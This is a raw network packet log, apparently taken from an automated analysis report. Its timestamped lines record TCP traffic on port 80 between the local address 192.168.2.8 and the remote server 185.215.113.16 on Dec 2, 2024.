                                                                                                                                                                                                        Dec 2, 2024 07:37:57.246021986 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.246679068 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.246776104 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.247107983 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.247751951 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.247826099 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.248843908 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.248961926 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.249003887 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.249093056 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.249962091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.250025988 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.250145912 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.251024961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.251137018 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.251437902 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.252111912 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.252216101 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.253196955 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.253314018 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.253319025 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.253362894 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.254375935 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.310519934 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.321016073 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.388638020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.388750076 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.389122963 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.389209032 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.389345884 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.390275955 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.390418053 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.391303062 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.396524906 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.402446985 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.402457952 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.402615070 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.402777910 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.402791977 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.402849913 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.403839111 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.404012918 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.404237986 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.404922009 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.405073881 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.405112982 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.406012058 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.406147003 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.406336069 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.407114983 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.407305956 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.407351971 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.408261061 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.408341885 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.408376932 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.409292936 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.409419060 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.409665108 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.410536051 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.410677910 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.410794973 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.411915064 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.411942959 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.412028074 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.412524939 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.412650108 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.412889004 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.413840055 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.413886070 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.413938046 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.414726973 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.414830923 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.414880037 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.415824890 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.415935040 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.415973902 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.440891027 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.441005945 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.441024065 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.441448927 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.441567898 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.441576004 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.442529917 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.442641020 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.442686081 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.443670034 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.443749905 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.443774939 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.444704056 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.444823027 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.444924116 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.445816994 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.445889950 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.445951939 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.446906090 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.446968079 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.446994066 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.448038101 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.448095083 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.448302031 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.449111938 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.449240923 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.449280024 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.450242043 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.450356960 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.450603962 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.451339006 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.451459885 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.451522112 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.452354908 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.452457905 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.452490091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.453470945 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.453636885 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.453655958 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.454758883 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.454818010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.454917908 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.455661058 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.455744028 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.455771923 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.456701994 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.456856012 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.456923008 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.457767010 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.457842112 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.457906008 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.458901882 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.458975077 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.459037066 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.460006952 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.460128069 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.460566044 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.461083889 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.461184025 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.461219072 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.462142944 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.462234974 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.462307930 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.463254929 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.463357925 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.463411093 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.464345932 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.464438915 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.464534044 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.465415955 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.465490103 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.465583086 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.466504097 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.466598988 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.466623068 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.467609882 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.467623949 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.467760086 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.468673944 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.468796968 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.468808889 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.469780922 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.469881058 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.469916105 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.470866919 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.470932961 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.471045017 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.472114086 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.472125053 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.472362995 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.473081112 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.473128080 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.473170996 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.474133968 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.474244118 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.474267006 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.475243092 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.475326061 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.475358963 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.476321936 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.476376057 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.476478100 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.477411985 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.477490902 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.477521896 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.478488922 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.478539944 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.478564024 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.479558945 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.479742050 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.589977980 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.590044975 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.590405941 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.590501070 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.590586901 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.591001034 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.591600895 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.591717958 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.591820955 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.592662096 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.603775978 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.603787899 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.603890896 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.604057074 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.604127884 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.604249954 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.605175018 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.605283022 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.605321884 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.606271029 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.606337070 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.606344938 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.607309103 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.607408047 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.607439041 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.608397007 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.608485937 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.608570099 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.609561920 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.609628916 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.609636068 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.610660076 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.610738993 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.611689091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.611905098 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.611955881 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.612766027 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.612844944 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.612875938 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.613867998 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.613966942 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.614000082 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.614948988 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.615040064 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.615066051 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.616029024 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.616159916 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.616233110 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.617130995 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.617204905 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.617204905 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.618225098 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.618309975 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.618402004 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.619303942 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.619362116 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.619491100 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.620397091 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.620500088 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.620526075 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.621453047 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.621546030 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.621584892 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.622570038 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.622627974 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.622642994 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.623645067 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.623703003 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.623744965 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.624748945 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.624865055 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.624895096 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.625811100 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.626023054 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.626964092 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.627069950 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.627104998 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.628091097 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.628142118 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.628309965 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.628551960 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.629132032 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.629206896 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.629239082 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.630204916 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.630306005 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.630351067 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.631325006 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.631392956 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.631393909 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.632375956 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.632494926 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.632534981 CET8049719185.215.113.16192.168.2.8
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.683816910 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.713382006 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.718386889 CET4971980192.168.2.8185.215.113.16
                                                                                                                                                                                                        Dec 2, 2024 07:37:57.833878994 CET8049719185.215.113.16192.168.2.8
